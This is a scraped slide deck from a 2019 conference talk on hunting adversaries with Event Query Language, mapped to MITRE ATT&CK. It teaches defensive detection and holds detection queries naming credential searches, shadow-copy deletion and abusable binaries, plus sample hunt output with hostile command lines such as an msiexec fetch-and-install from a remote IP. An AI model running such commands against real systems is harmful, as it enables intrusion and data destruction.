Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

The Hunter Games: How to Find the Adversary with Event Query Language

206 views

Published on

Circle City Con 2019 and BSides SATX 2019

Abstract:
How do you find malicious activity? We often resort to the cliche, you know it when you see it, but how do you even see it, without drowning in data? MITRE’s ATT&CK knowledge base organizes adversary behavior into tactics and techniques, and orients our approach to endpoint data. It suggests questions that might be worth asking, but not a way to ask them. The Event Query Language (EQL) allows a security analyst to naturally express queries for IOC search, hunting, and behavioral detections, while remaining platform and data source agnostic.

In this talk, I will demonstrate the iterative process of establishing situational awareness in your environment, creating targeted detections, and hunting for the adversary in your environment with real data, queries, and results.

Published in: Technology
  • Be the first to comment

  • Be the first to like this

The Hunter Games: How to Find the Adversary with Event Query Language

  1. 1. 1ENDGAME THE HUNTER GAMES How to find the adversary with Event Query Language Ross Wolf
  2. 2. 2ENDGAME chmod +rw bio Ross Wolf @rw_access Threat Researcher at Endgame - Develop detection frameworks and individual detections - Developed Event Query Language - Experience red- and blue-teaming
  3. 3. 3ENDGAME EXAMPLE REPORT WOLF
  4. 4. 4ENDGAME NOW WHAT?
  5. 5. 5ENDGAME TALK OVERVIEW • Developing threat-based detections with ATT&CK and your data • Crash course through Event Query Language • Follow the trail of a generic threat actor, writing detections for each step • Explore threat hunting methods to find for the known unknown • Contribute back to the community
  6. 6. ENDGAME THREAT BASED DETECTION 01
  7. 7. 7ENDGAME DETECTION PROCESS • Use ATT&CK to identify common behaviors, instead of just tools • Explore the mind of the attacker • Understand your data and visibility • Express detection logic for your platform • Continuously create, test, and refine analytics • Atomic Red Team, CALDERA, Red Team Automation, etc. • Evaluate against human red teams • Don't be afraid to retire analytics! https://www.mitre.org/publications/technical-papers/finding-cyber-threats-with-attck-based-analytics
  8. 8. 8ENDGAME ATTACKER TRADECRAFT • Gain access to establish the initial foothold • Discover information about the endpoint • Persist to survive system reboots • Establish command and control (C2) • Gain additional privileges and credentials • Move between hosts and execute commands • Collect and exfiltrate sensitive information • Destroy data or negatively impact mission • All while evading monitoring and protections ATT&CK Tactics Initial Access Execution Persistence Privilege Escalation Defense Evasion Credential Access Discovery Lateral Movement Collection Command and Control Exfiltration Impact
  9. 9. 9ENDGAME MITRE ATT&CK™ FRAMEWORK • Knowledge base that organizes behaviors (techniques) by objectives (tactics) • Most techniques are used by multiple groups and red teams • Hundreds of references to threat reports
  10. 10. 10ENDGAME ATT&CK TECHNIQUE https://attack.mitre.org/techniques/T1193/
  11. 11. 11ENDGAME KNOW YOUR DATA • Data originally gathered from Sysmon • Converted to a common schema • file, process, network, and registry event monitoring https://eqllib.readthedocs.io/en/latest/schemas.html command_line C:WindowsExplorer.EXE md5 ac4c51eb24aa95b77f705ab159189e24 parent_process_name userinit.exe parent_process_path C:Windowssystem32userinit.exe pid 2460 ppid 3052 process_name explorer.exe process_path C:Windowsexplorer.exe subtype create timestamp 131485997150000000 user_domain research user_name researcher
  12. 12. 12ENDGAME INTRO TO EQL • Event Query Language is simple and concise • Schema-independent and OS-agnostic • Designed for real-time detection with stream processing • Supports multi-event behaviors, stacking and sifting through data • Function syntax instead of keyword explosion (e.g. length(field))
  13. 13. 13ENDGAME SIMPLE QUERIES • Boolean and comparison logic and or not < <= == != >= > • Wildcard matching with * character • String comparisons are case-insensitive process where process_name == "svchost.exe" and (command_line != "* -k *" or parent_process_name != "services.exe") https://eql.readthedocs.io/en/latest/query-guide
  14. 14. 14ENDGAME SEQUENCES • Multi-event behaviors with ordering • Match properties between events with by syntax • Time limits maxspan=1 hr • Sequences can be expired with an until condition sequence with maxspan=5m [ file where file_name == "*.exe"] by user_name, file_path [ process where true] by user_name, process_path
  15. 15. 15ENDGAME JOINS • Match events specified, without time limits • Supports by and until syntax for additional matching or state • Unlike SQL, it finds adjacent pairs instead of cross-products join [file where file_path == "*System32Tasksh4x0r.xml"] [registry where registry_path == "*runonceh4xor"]
  16. 16. 16ENDGAME JOINS join by source_ip, destination_ip [network where destination_port == 3389] // RDP [network where destination_port == 135] // RPC [network where destination_port == 445] // SMB • Match events specified, without time limits • Supports by and until syntax for additional matching or state • Unlike SQL, it finds adjacent pairs instead of cross-products
  17. 17. 17ENDGAME PIPES AND OUTLIERS • Pipes can be used to transform or reduce output • Combine in various ways to perform stacking or reduce data set • count filter head sort tail unique unique_count process where true // Remove duplicate pairs | unique process_name, command_line // Count per process_name to get unique # of commands | count process_name | filter count < 5
  18. 18. 18ENDGAME PROCESS LINEAGE network where process_name == "powershell.exe" and not descendant of [process where process_name == "explorer.exe"] • Natively tracks process lineage by monitoring create/terminate events • Supports descendant of, child of, and event of • Combine with other boolean logic
  19. 19. 19ENDGAME • Natively tracks process lineage by monitoring create/terminate events • Supports descendant of, child of, and event of • Combine with other boolean logic PROCESS LINEAGE file where file_name == "*.exe" and event of [process where child of [process where process_name == "powershell.exe"]]
  20. 20. ENDGAME DETECT KNOWN BEHAVIORS 02
  21. 21. 21ENDGAME APPROACH TO DETECTION • Understand common tactics employed by the adversary • Next, move to specific methods or techniques • From there we can craft detection logic • When necessary, understand operating system internals Initial Access Execution Persistence Privilege Escalation Command and Control Defense Evasion Credential Access Discovery Lateral Movement Collection Exfiltration Impact
  22. 22. 22ENDGAME INITIAL ACCESS & EXECUTION • Technique Spearphishing Attachment (T1193) PowerShell (T1086) • Detection Scriptable child processes of Office products - PowerShell, VB script, cmd.exe process where parent_process_name in ("winword.exe", "excel.exe", "powerpnt.exe") and process_name in ("powershell.exe", "cscript.exe", "wscript.exe", "cmd.exe") Initial Access Execution Persistence Privilege Escalation Command and Control Defense Evasion Credential Access Discovery Lateral Movement Collection Exfiltration Impact
  23. 23. 23ENDGAME INITIAL ACCESS & EXECUTION • Technique Spearphishing Attachment (T1193) • Detection Office creating a PE file that quickly executes sequence with maxspan=5m [file where file_name == "*.exe" and process_name in ("winword.exe", "excel.exe", "powerpnt.exe") ] by file_path [process where true] by process_path Initial Access Execution Persistence Privilege Escalation Command and Control Defense Evasion Credential Access Discovery Lateral Movement Collection Exfiltration Impact
  24. 24. 24ENDGAME PERSISTENCE & PRIVILEGE ESCALATION • Technique Scheduled Task (T1053) • Detection The API is cumbersome, so many tools directly execute schtask.exe. Look for non-SYSTEM users creating tasks that run as SYSTEM process where process_name == "schtask.exe" and user_name != "SYSTEM" and (command_line == "* /ru system" or command_line == '* /ru "nt authority"') | unique user_name, command_line Initial Access Execution Persistence Privilege Escalation Command and Control Defense Evasion Credential Access Discovery Lateral Movement Collection Exfiltration Impact
  25. 25. 25ENDGAME network where not destination_port in ( 1,3,4,6,7,9,13,17,19,20,21,22,23,24,25,26,30,32,33,37,42,43, 49,5370,79,80,81,82,83,84,85,88,89,90,99,100,106,109,110,111, 113,119,125,135,139,143,144,146,161,163,179,199,211,212,222, 254,255,256,259,264,280,301,306, /* many more? */) | unique destination_address, destination_port COMMAND AND CONTROL (C2) • Techniques Uncommonly Used Port (T1065) Initial Access Execution Persistence Privilege Escalation Command and Control Defense Evasion Credential Access Discovery Lateral Movement Collection Exfiltration Impact
  26. 26. 26ENDGAME • Techniques Outgoing Connection from Abusable Process (T???) • Detection Look for network from abusable binaries Continuously tune to your environment COMMAND AND CONTROL (C2) Initial Access Execution Persistence Privilege Escalation Command and Control Defense Evasion Credential Access Discovery Lateral Movement Collection Exfiltration Impact sequence by pid [process where subtype.create] [network where process_name in ( // known LOLBINS "powershell.exe", "mshta.exe", "installutil.exe", "msxsl.exe", "rundll32.exe") | unique events[0].process_path, events[1].destination_address, events[1].destination_port
  27. 27. 27ENDGAME DEFENSE EVASION • Technique Masquerading (T1096) • Detection Look for executables matching names of known Windows binaries from system32, but in the wrong directory process where process_name in ( "csrss.exe", "dllhost.exe", "lsass.exe", "lsm.exe", "services.exe", "winlogon.exe", /* etc */ ) and not (process_path == "C:windowssystem32*" and process_path != "C:windowssystem32*") Initial Access Execution Persistence Privilege Escalation Command and Control Defense Evasion Credential Access Discovery Lateral Movement Collection Exfiltration Impact https://www.endgame.com/blog/how-hunt-masquerade-ball
  28. 28. 28ENDGAME DEFENSE EVASION • Technique Process Injection (T1096) Process Hollowing (T1093) • Detection Look for process creations from the wrong parent process where (process_name == "lsass.exe" and parent_process_name != "wininit.exe") or (process_name == "LogonUI.exe" and not parent_process_name in ("winlogon.exe", "wininit.exe")) or (process_name == "services.exe" and parent_process_name != "wininit.exe") or (process_name == "svchost.exe" and parent_process_name != "services.exe" and // the system32svchost.exe executes syswow64svchost.exe for 32-bit DLLs not (parent_process_path == "*system32svchost.exe" and process_path == "*syswow64svchost.exe")) Initial Access Execution Persistence Privilege Escalation Command and Control Defense Evasion Credential Access Discovery Lateral Movement Collection Exfiltration Impact
  29. 29. 29ENDGAME CREDENTIAL ACCESS • Technique Access Sensitive Data or Credentials in Files (T1087) • Detection Look for commands to search for "password" process where process_name == "findstr.exe" and command_line == "*password*" | unique parent_process, command_line Initial Access Execution Persistence Privilege Escalation Command and Control Defense Evasion Credential Access Discovery Lateral Movement Collection Exfiltration Impact
  30. 30. 30ENDGAME DISCOVERY • Technique Account Discovery (T1087) Remote System Discovery (T1096) System Account Discovery (T1033) • Detection Look for any users that run multiple different types of discovery commands join by user_name [process where process_name in ("ipconfig.exe", "hostname.exe", "whoami.exe")] [process where process_name == "net.exe" and (command_line == "*group*" or command_line == "* user*")] [process where process_name in ("tasklist.exe", "qprocess.exe", "sc.exe")] | unique user_name Initial Access Execution Persistence Privilege Escalation Command and Control Defense Evasion Credential Access Discovery Lateral Movement Collection Exfiltration Impact
  31. 31. 31ENDGAME LATERAL MOVEMENT • Technique Windows Remote Management (T1028) PowerShell (T1086) • Approach Look for incoming WinRM connections with execution of the provider sequence with maxspan=2s [network where destination_port in (5985, 5986) and process_name == "svchost.exe"] [process where process_name == "wsmprovhost.exe" and command_line == "*embedding*"] | unique events[0].source_address,events[0].destination_address, events[1].user_name Initial Access Execution Persistence Privilege Escalation Command and Control Defense Evasion Credential Access Discovery Lateral Movement Collection Exfiltration Impact
  32. 32. 32ENDGAME COLLECTION & EXFILTRATION • Technique Data Staged (T1074) Data Compressed (T1072) Data Encrypted (T1022) • Detection Look for known command lines for tools that indicate compression and encryption Initial Access Execution Persistence Privilege Escalation Command and Control Defense Evasion Credential Access Discovery Lateral Movement Collection Exfiltration Impactsequence by unique_pid with maxspan=5m [process where command_line == "* -hp*" or command_line == "* /hp*"] [file where file_name == "*.rar"] | unique events[0].process_path, events[1].file_name
  33. 33. 33ENDGAME IMPACT • Technique Inhibit System Recovery (T1490) • Detection Monitor known command lines process where (process_name == "vssadmin.exe" and command_line == "*delete*") or (process_name == "wmic.exe" and command_line == "*shadow*delete*") or (process_name == "wevtutil.exe" and command_line == "* cl *") Initial Access Execution Persistence Privilege Escalation Command and Control Defense Evasion Credential Access Discovery Lateral Movement Collection Exfiltration Impact
  34. 34. ENDGAME HUNTING FOR THE UNKNOWN 03
  35. 35. 35ENDGAME FUTURE THREAT REPORT
  36. 36. 36ENDGAME FUTURE THREAT REPORT
  37. 37. 37ENDGAME APPROACHES • We want to look proactively for evidence of an adversary • Often technique-agnostic, but still follow attacker lifecycle • Ask environment-oriented questions • Establish situational awareness and track deviations • Prevalence • Recency • Patterns is this threat hunting? 736c963c78ed5b4587f36ca6f70dfbcb
  38. 38. 38ENDGAME UNUSUAL PARENT-CHILD RELATIONSHIPS What parent-child process relationships are rare and recent? process where subtype.create | unique_count parent_process_name, process_name | tail 100 | sort count | head 10 parent_process_name command_line MSI9BBF.tmp "C:Program Files (x86)Common FilesJavaJava Updatejaureg.exe" -u auto-update powershell.exe rundll32.exe C:UsersvagrantAppDataLocalcyzfc.dat, PointFunctionCall wuauclt.exe "C:WINDOWSSoftwareDistributionDownload InstallAM_Delta_Patch_1.293.2420.0.exe" WD /q AM_Delta_Patch_ 1.293.2420.0.exe C:WINDOWSsystem32MpSigStub.exe /stub 1.1.1 ...
  39. 39. 39ENDGAME UNUSUAL PARENT-CHILD RELATIONSHIPS What parent-child process relationships are rare and recent? process where subtype.create and ( process_name in ("cmd.exe", "powershell.exe") or parent_process_name in ("cmd.exe", "powershell.exe")) | unique_count parent_process_name, process_name | tail 100 | sort count | head 10 parent_process_name command_line powershell.exe rundll32.exe C:UsersvagrantAppDataLocalcyzfc.dat, PointFunctionCall
  40. 40. 40ENDGAME REMOTE ACCESS TOOLS What recently first-seen processes also made network connections? process_name command_line InstallUtil.exe C:WindowsMicrosoft.NETFramework64v4.0.30319 InstallUtil.exe /logfile= /LogToConsole=False /U mydotnet.exe OneDriveSetup.exe "C:UsersdeveloperAppDataLocalMicrosoftOneDrive UpdateOneDriveSetup.exe" /update /restart OfficeClickToRun.exe "C:Program FilesCommon FilesMicrosoft SharedClickToRunUpdates16.0.11601.20230 OfficeClickToRun.exe" /update join by process_path [process where subtype.create] [network where true] | unique events[0].process_path | tail 50 i'm in
  41. 41. 41ENDGAME SUDDEN EXTROVERTS What processes have been seen before, but only recently made network activity? command_line msiexec.exe /quiet /i http://172.31.27.16:8000/bin/Installer.msi sequence by process_path [process where timestamp_utc < "2019-05-01"] [network where timestamp_utc > "2019-05-17"] until [network where timestamp_utc < "2019-05-17"] | unique process_path
  42. 42. 42ENDGAME FILE SYSTEM WEAKNESSES What privileged files were modified by a user and but executed SYSTEM? user_name process_name file_path vagrant jusched.exe C:Windowssystem32infsvchost.exe zoom CptInstall.exe C:Program Files (x86)Common FilesZoomSupportCptService.exe sequence [file where subtype.create and file_name == "*.exe" and user_name != "SYSTEM"] by file_path [process where user_name == "SYSTEM"] by process_path | unique events[0].file_path
  43. 43. 43ENDGAME REMOTE RECONNAISSANCE What enumeration commands were executed from processes with outgoing network activity? command_line process_name count whoami.exe powershell_ise.exe 1 hostname.exe dxdiag0732.exe 1 netstat.exe python.exe 1 process where process_name in ( "whoami.exe", "hostname.exe", "ipconfig.exe", "net.exe", "netstat.exe", "tasklist.exe" ) and child of [network where subtype.outgoing] | unique parent_process_path, process_name | unique_count parent_process_path *slaps eql* this hunt can find so many recon commands
  44. 44. 44ENDGAME BRUTE FORCE ATTEMPTS Are there multiple logon failures and eventually a success from a remote host? sequence by ip_address with maxspan=1h [security where event_id == 4625 and logon_type in (3,5,10)] [security where event_id == 4625 and logon_type in (3,5,10)] [security where event_id == 4625 and logon_type in (3,5,10)] [security where event_id == 4625 and logon_type in (3,5,10)] [security where event_id == 4624 and logon_type in (3,5,10)] until [security where event_id == 4624] // success 4624 – failure 4625 - success
  45. 45. 45ENDGAME WHYMI HERE? What commands were spawned from WMI remotely or as a different user? process where subtype.create | unique authentication_id | filter not user_name in ("SYSTEM", "NT AUTHORITY", "LOCAL SERVICE") and (process_name == "wmiprvse.exe" or parent_process_name == "wmiprvse.exe") | unique process_name command_line cmd /c "tasklist /svc > %SystemRoot%TEMPnessus_task_listIVC4798D.TMP & ren %SystemRoot%TEMPnessus_task_listIVC4798D.TMP nessus_task_listIVC4798D.TXT" recdiscm32.exe 10.1.2.3admin$system32taskchg16.exe 45ENDGAME WHYMI HERE? What commands were spawned from WMI remotely or as a different user? process where subtype.create | unique authentication_id | filter not user_name in ("SYSTEM", "NT AUTHORITY", "LOCAL SERVICE") and (process_name == "wmiprvse.exe" or parent_process_name == "wmiprvse.exe") | unique process_name command_line cmd /c "tasklist /svc > %SystemRoot%TEMPnessus_task_listIVC4798D.TMP & ren %SystemRoot%TEMPnessus_task_listIVC4798D.TMP nessus_task_listIVC4798D.TXT" recdiscm32.exe 10.1.2.3admin$system32taskchg16.exe
  46. 46. 46ENDGAME SUSPICIOUS LATERAL MOVEMENT What endpoints remotely connected via SMB and RPC to potentially upload and execute? sequence by destination_address with maxspan=30s [network where subtype.incoming and destination_port == 445] [network where subtype.incoming and destination_port == 135] | unique source_address • Noisy on domain controllers • Incoming traffic to workstations is suspicious
  47. 47. ENDGAME EQL COMMUNITY04
  48. 48. 48ENDGAME DOWNLOAD EQL • Install the python package (supports 2.7, 3.4+) with pip install eql • Built in CLI eql query with stdin/stdout redirection • Read the Getting Started blog post for more information • endgame.com/blog/technical-blog/getting-started-eql
  49. 49. 49ENDGAME DEMO
  50. 50. 50ENDGAME ANALYTICS LIBRARY • Browse the analytics library • eqllib.readthedocs.io • Contribute your detection and hunting logic • github.com/endgameinc/eqllib • 45+ analytics mapped to MITRE ATT&CK with contributions from Endgame and Red Canary • Multiple data sets to get your hands dirty • github.com/endgameinc/eqllib/tree/master/data
  51. 51. 51ENDGAME ANALYTICS LIBRARY
  52. 52. 52ENDGAME NORMALIZATION • Contribute schema mappings • Currently map to Microsoft Sysmon and MITRE Cyber Analytics Repository • Convert queries to mapped data sources $ eqllib convert-query -s "Microsoft Sysmon" 'process where subtype.create and process_name == "mshta.exe" and command_line == "* c:programdata*.hta"' process where EventId == 1 and Image == "*mshta.exe" and CommandLine == "* c:programdata*.hta" • Normalize from mapped data sources to sharable format
  53. 53. 53ENDGAME WHAT'S NEXT? • Early June update to EQL 0.7 • Contains a schema validation with better error checking • Cleaner python API for integrating with other projects • Summer release of 75+ atomic analytics mapped to ATT&CK
  54. 54. 54ENDGAME GET IN TOUCH • Follow EQL on Twitter • @eventquerylang • Chat on Gitter • gitter.im/eventquerylang/community • Email us • eql AT endgame.com
  55. 55. 55ENDGAME RESOURCES • Getting started with EQL (blog) • endgame.com/blog/technical-blog/getting-started-eql • Endgame Guide to Threat Hunting (PDF) • pages.endgame.com/wc-guide-to-threat-hunting.html • Follow the guide for creating sophisticated queries • eql.readthedocs.io/query-guide • Documentation • eql.readthedocs.io • Clone it! • github.com/endgameinc/eql • github.com/endgameinc/eqllib
  56. 56. 56ENDGAME ENDGAME ENDGAME@ENDGAMEINC ENDGAMEINC THANK YOU www.endgame.com

×